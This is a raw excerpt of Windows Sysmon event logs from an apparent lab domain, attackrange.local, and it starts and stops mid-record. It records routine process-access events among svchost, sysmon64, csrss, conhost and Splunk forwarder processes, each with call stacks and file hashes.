Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.209{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.209{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.209{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.210{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D51B6CB11BA4D143182C4FE7E880B982,SHA256=BF6BCF773AD31D4F0BC4CACF5CD0E02A344788A943C623EEC87D0F3616795E18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.818{0C1E0330-F83F-60EB-E179-00000000D001}904936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.803{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2820B89622C65C357C0C8F547ED1CB81,SHA256=BB5F61A0BDD0AAD79CD43A2A2C6D88BA84CA9CF70137D67D4D3B4F20F4C1EB89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:27.568{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=791BF8884A4C8C3D4C3D8B6C80067C2F,SHA256=0C9185719BDAC01AE4E26955F82007900DAD3DFB3687F69149FE5FE5B4EC1793,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program 